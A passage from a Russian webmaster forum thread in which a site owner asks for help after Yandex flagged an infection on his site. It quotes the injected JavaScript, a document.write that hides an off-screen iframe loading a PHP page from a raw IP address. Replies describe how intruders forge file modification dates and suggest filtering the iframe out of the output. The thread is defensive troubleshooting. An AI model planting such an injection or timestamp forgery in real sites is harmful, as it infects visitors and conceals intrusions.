- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Кто-то сталкивался с таким: впс плеск, арендован у рбк, на сайте есть фрейворк expression engine.
Сколько времени на сайте провожу ни разу не заметил никакого вируса. Захожу и получаю предупреждение от яндекса, мол вирус на сайте. Пошел в вебмастер - говорят вирус. Идут смотреть не нашел ничего. Пишу ему, они сказали:
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в js скрипте
вредоносный код следующего содержания:
document.write('<style>.x1vvy5fkyw { position:absolute; left:-1828px; top:-1060px} </style> <div class="x1vvy5fkyw"><iframe src="http://69.89.4.78/909a4fce9e610c7ad320e6942b37edf4/q.php" width="418" height="110"></iframe></div>')
посмотрел все файлы, не нашел ничего.
После переписки, сказали что возможно проблема в модулях веб-сервера, которые могут быть заражены либо иметь дырки, которые собственно и делают такие манипуляции с файлами. Что характерно, файлы изменяются, но дата изменения файла не меняется... Парадокс.
Сталкивался ли кто-то?
Дата изменения файла редактируется при наличии определенного доступа. То есть:
1) Получаем информацию о времени изменения файла
2) Изменяем файл
3) Ставим дату изменения ту, что была до этого.
Необязательно должно быть, то что отдается в браузер. Может при помощи echo base64_decode(); отдаваться вредоносный JS.
UPDATE:
Есть вариант, правда не сказать, что он ТРУшный:
1) В самом начале включаем буферизацию и назначаем колбэк функцию для обработки инфы из буфера перед отдачей.
2) Создаем функцию fuckBadCode()
В итоге мы из ХТМЛ кода удаляем вставку АйФрейма. Если интересно, можно удалить всё, начиная от docwrite и до закрывающей скобки.
урл покажите...
Милованов Ю.С, внутрь ничего не добавляется. заражаются именно js файлы... как там можно сделать функции вывода на пхп? никак. если я скачиваю файл и вижу что в нет вируса, то значит нет. Идет какое-то программное внедрение извне. В кроне ничего нет, вот и думаем сидим, либо дырка в плеске, либо где-то шел.
---------- Добавлено 12.03.2013 в 18:40 ----------
kgtu5, ввв.s!lvermed!a.ру ! - заменить на i
Мобильную версию отключите, все равно там только 2 строчки и ссылка на дле-ньюс...
kgtu5, и чо? я спрашивал про мобильную версию что-то?
айболитом пройдитесь.
дата изменения файла - вообще ни о чем не говорит, она просто подделывается.
Культура прет "и чо"...
Вот я с мобильника зашел, и чо...
kgtu5, причем тут культура-мультура, вы спросили адрес чтоб с мобильника посмотреть?
---------- Добавлено 12.03.2013 в 19:03 ----------
TF-Studio, айболит это что? Антивирус или ?
Чем плох мобильник? Редиректы хорошо видно с него..
Чем плох мобильник?
Что вы с мобильника увидели там такого интересного, чтобы решить проблему? И суть вообще в чем вашей просьбы?